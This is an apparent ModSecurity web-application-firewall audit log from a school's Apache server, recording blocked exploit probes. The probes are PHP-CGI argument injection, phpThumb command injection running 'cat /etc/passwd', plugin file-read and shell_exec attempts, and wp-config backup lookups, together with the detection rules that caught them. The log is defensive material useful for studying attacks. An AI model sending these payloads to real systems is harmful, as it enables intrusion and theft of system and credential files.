Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a2d4546-Z--
--e9d3b573-A--
[01/May/2025:10:34:05 +0700] aBLrrY144kZ4LAGlEgz3vwAAAMQ 103.236.140.4 45108 103.236.140.4 8181
--e9d3b573-B--
GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Content-Length: 42
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--e9d3b573-C--
--e9d3b573-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9d3b573-E--
--e9d3b573-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070445161526 3124 (- - -)
Stopwatch2: 1746070445161526 3124; combined=1748, p1=425, p2=1295, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9d3b573-Z--
--53e93c50-A--
[01/May/2025:10:34:07 +0700] aBLrr4144kZ4LAGlEgz30wAAANE 103.236.140.4 45228 103.236.140.4 8181
--53e93c50-B--
GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--53e93c50-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--53e93c50-E--
--53e93c50-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070447691176 2299 (- - -)
Stopwatch2: 1746070447691176 2299; combined=631, p1=446, p2=154, p3=0, p4=0, p5=30, sr=67, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--53e93c50-Z--
--d9aea265-A--
[01/May/2025:10:34:12 +0700] aBLrtI144kZ4LAGlEgz34QAAANE 103.236.140.4 45452 103.236.140.4 8181
--d9aea265-B--
GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--d9aea265-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d9aea265-E--
--d9aea265-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070452382506 2250 (- - -)
Stopwatch2: 1746070452382506 2250; combined=655, p1=425, p2=202, p3=0, p4=0, p5=28, sr=60, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d9aea265-Z--
--4c778041-A--
[01/May/2025:10:34:14 +0700] aBLrtsVMAgMJpNzaVtKwngAAAEQ 103.236.140.4 45560 103.236.140.4 8181
--4c778041-B--
GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4c778041-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c778041-E--
--4c778041-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070454614218 2331 (- - -)
Stopwatch2: 1746070454614218 2331; combined=892, p1=553, p2=294, p3=0, p4=0, p5=45, sr=142, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c778041-Z--
--0e8cb97d-A--
[01/May/2025:10:34:16 +0700] aBLruOVeTgVPHjrSAYAT2gAAABI 103.236.140.4 45638 103.236.140.4 8181
--0e8cb97d-B--
GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--0e8cb97d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0e8cb97d-E--
--0e8cb97d-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070456265527 2016 (- - -)
Stopwatch2: 1746070456265527 2016; combined=753, p1=421, p2=280, p3=0, p4=0, p5=52, sr=76, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0e8cb97d-Z--
--a213246c-A--
[01/May/2025:10:34:21 +0700] aBLrvcVMAgMJpNzaVtKwtgAAAFI 103.236.140.4 45870 103.236.140.4 8181
--a213246c-B--
GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--a213246c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a213246c-E--
--a213246c-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070461366722 2232 (- - -)
Stopwatch2: 1746070461366722 2232; combined=699, p1=475, p2=192, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a213246c-Z--
--cf1cca03-A--
[01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT7AAAAAs 103.236.140.4 45884 103.236.140.4 8181
--cf1cca03-B--
GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--cf1cca03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cf1cca03-E--
--cf1cca03-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070461568573 2390 (- - -)
Stopwatch2: 1746070461568573 2390; combined=641, p1=453, p2=155, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cf1cca03-Z--
--7056942e-A--
[01/May/2025:10:34:21 +0700] aBLrvSgtr0Qsi1mFAsMNtgAAAJE 103.236.140.4 45898 103.236.140.4 8181
--7056942e-B--
GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7056942e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7056942e-E--
--7056942e-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070461770381 1735 (- - -)
Stopwatch2: 1746070461770381 1735; combined=582, p1=443, p2=116, p3=0, p4=0, p5=23, sr=110, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7056942e-Z--
--2bf2d741-A--
[01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT8AAAAAo 103.236.140.4 45904 103.236.140.4 8181
--2bf2d741-B--
GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--2bf2d741-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2bf2d741-E--
--2bf2d741-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070461971807 2014 (- - -)
Stopwatch2: 1746070461971807 2014; combined=540, p1=338, p2=173, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2bf2d741-Z--
--7fc93e62-A--
[01/May/2025:10:34:22 +0700] aBLrvuVeTgVPHjrSAYAT8gAAAAc 103.236.140.4 45914 103.236.140.4 8181
--7fc93e62-B--
GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7fc93e62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7fc93e62-E--
--7fc93e62-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070462173298 1947 (- - -)
Stopwatch2: 1746070462173298 1947; combined=469, p1=332, p2=110, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7fc93e62-Z--
--5ca2da45-A--
[01/May/2025:10:34:22 +0700] aBLrvigtr0Qsi1mFAsMNuAAAAJc 103.236.140.4 45924 103.236.140.4 8181
--5ca2da45-B--
GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--5ca2da45-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5ca2da45-E--
--5ca2da45-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070462374776 1740 (- - -)
Stopwatch2: 1746070462374776 1740; combined=437, p1=308, p2=102, p3=0, p4=0, p5=26, sr=47, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5ca2da45-Z--
--9f84ba28-A--
[01/May/2025:10:34:22 +0700] aBLrvo144kZ4LAGlEgz3-wAAANg 103.236.140.4 45942 103.236.140.4 8181
--9f84ba28-B--
GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9f84ba28-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f84ba28-E--
--9f84ba28-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070462575920 1848 (- - -)
Stopwatch2: 1746070462575920 1848; combined=638, p1=468, p2=144, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f84ba28-Z--
--1dd12c18-A--
[01/May/2025:12:19:35 +0700] aBMEZygtr0Qsi1mFAsMwjQAAAJc 103.236.140.4 59972 103.236.140.4 8181
--1dd12c18-B--
GET /wp-config.php~ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 89.46.106.218
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 89.46.106.218
X-Forwarded-Proto: http
Connection: close
Accept: */*
--1dd12c18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1dd12c18-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746076775936923 871 (- - -)
Stopwatch2: 1746076775936923 871; combined=361, p1=297, p2=0, p3=0, p4=0, p5=63, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1dd12c18-Z--
--e0bf2f19-A--
[01/May/2025:12:37:08 +0700] aBMIhI144kZ4LAGlEgwhOQAAAMo 103.236.140.4 35850 103.236.140.4 8181
--e0bf2f19-B--
GET /wp-config.php.org HTTP/1.0
Host: smkn22-jkt.sch.id
